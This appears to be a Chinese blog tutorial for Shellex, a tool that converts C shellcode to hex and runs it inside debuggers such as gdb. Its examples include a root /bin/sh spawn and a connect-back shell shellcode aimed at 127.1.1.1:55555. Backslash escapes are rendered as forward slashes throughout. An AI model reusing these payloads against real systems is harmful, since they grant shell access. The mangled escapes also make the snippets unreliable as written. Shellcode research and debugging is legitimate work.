这篇文章给大家分享的是有关Shellex怎么用的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。
Shellex
Shellex是一款功能强大的C-shellcode转换器,可以帮助广大研究人员将C-shellcode转换为十六进制代码,并且能够在gdb、windbg、radare2、ollydbg、x64dbg、immunity调试器和010编辑器中粘贴和执行shellcode。
在Shellex的帮助下,广大研究人员可以将C-shellcode代码转换为十六进制代码,并且还可以在C编译器中编译时进行转换,整个过程只需要执行Shellex,并将shellcode代码拷贝进去并按下回车键即可。
比如说,我们可以转换多行混合了ASCII代码的C-shellcode(注意混合部分/x68//sh/x68/bin/x89):
"/x6a/x17/x58/x31/xdb/xcd/x80" "/x6a/x0b/x58/x99/x52/x68//sh/x68/bin/x89/xe3/x52/x53/x89/xe1/xcd/x80"
Shellex输出如下:
6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80
转换包含注释代码的C-shellcode:
"/x68" "/x7f/x01/x01/x01" // <- IP: 127.1.1.1 "/x5e/x66/x68" "/xd9/x03" // <- Port: 55555 "/x5f/x6a/x66/x58/x99/x6a/x01/x5b/x52/x53/x6a/x02" "/x89/xe1/xcd/x80/x93/x59/xb0/x3f/xcd/x80/x49/x79" "/xf9/xb0/x66/x56/x66/x57/x66/x6a/x02/x89/xe1/x6a" "/x10/x51/x53/x89/xe1/xcd/x80/xb0/x0b/x52/x68/x2f" "/x2f/x73/x68/x68/x2f/x62/x69/x6e/x89/xe3/x52/x53" "/xeb/xce"
Shellex输出如下:
68 7F 01 01 01 5E 66 68 D9 03 5F 6A 66 58 99 6A 01 5B 52 53 6A 02 89 E1 CD 80 93 59 B0 3F CD 80 49 79 F9 B0 66 56 66 57 66 6A 02 89 E1 6A 10 51 53 89 E1 CD 80 B0 0B 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 EB CE
如果你需要Shellex输出新的C-shellcode字符串,可以使用-h参数,比如说:
./shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80 /x6A/x17/x58/x31/xDB/xCD/x80/x6A/x0B/x58/x99/x52/x68/x2F/x2F/x73/x68/x68/x2F/x62/x69/x6E/x89/xE3/x52/x53/x89/xE1/xCD/x80
Shellex安装
首先,广大研究人员需要使用下列代码将该项目源码克隆至本地:
git clone https://github.com/David-Reguera-Garcia-Dreg/shellex.git
针对Windows:
shellex/bins/shellex.exe
针对Linux:
sudo apt-get install tcc shellex/linuxbins/shellex
在gdb中复制和执行shellcode
首先,我们需要运行Shellex。
接下来,输入我们的shellcode:
"/x6a/x17/x58/x31/xdb/xcd/x80" "/x6a/x0b/x58/x99/x52/x68//sh/x68/bin/x89/xe3/x52/x53/x89/xe1/xcd/x80"
按下回车键后,再按下Control+D键。
使用shellex -h命令将Shellex输出转换为C-Hex字符串:
shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80
将C-Hex字符串以源码形式(包含“echo”命令)写入至文件:
echo -ne "/x6A/x17/x58/x31/xDB/xCD/x80/x6A/x0B/x58/x99/x52/x68/x2F/x2F/x73/x68/x68/x2F/x62/x69/x6E/x89/xE3/x52/x53/x89/xE1/xCD/x80" > /tmp/sc
接下来,将源码文件写入当前指令指针。
32位:
restore /tmp/sc binary $eip x/30b $eip x/15i $eip
64位:
restore /tmp/sc binary $rip x/30b $rip x/15i $rip
x/30b是shellcode的字节大小,我们可以使用下列命令获取到大小值:
wc -c /tmp/sc
x/15i是显示的指令数量,我们可以使用ndisasm获取正确的数量:
sudo apt-get install nasm
32位:
ndisasm -b32 /tmp/sc ndisasm -b32 /tmp/sc | wc -l
64位:
ndisasm -b64 /tmp/sc ndisasm -b64 /tmp/sc | wc -l
无交互模式
在Linux中转换“/x6a/x17/x58/x31/xdb/xcd/x80”:
echo "/"//x6a//x17//x58//x31//xdb//xcd//x80/"" | shellex
在Windows中转换“/x6a/x17/x58/x31/xdb/xcd/x80”:
echo "/x6a/x17/x58/x31/xdb/xcd/x80" | shellex.exe
Windows下写入多行文件:
C:/Users/Dreg/Desktop/shellex/bins>type sc.txt "/x6a/x17/x58/x31/xdb/xcd/x80" "/x6a/x0b/x58/x99/x52/x68//sh/x68/bin/x89/xe3/x52/x53/x89/xe1/xcd/x80" C:/Users/Dreg/Desktop/shellex/bins>type sc.txt | shellex.exe
Linux下写入多行文件:
dreg@fr33project# cat sc.txt "/x6a/x17/x58/x31/xdb/xcd/x80" "/x6a/x0b/x58/x99/x52/x68//sh/x68/bin/x89/xe3/x52/x53/x89/xe1/xcd/x80" dreg@fr33project# cat sc.txt | shellex
感谢各位的阅读!关于“Shellex怎么用”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,让大家可以学到更多知识,如果觉得文章不错,可以把它分享出去让更多的人看到吧!
原创文章,作者:1402239773,如若转载,请注明出处:https://blog.ytso.com/222537.html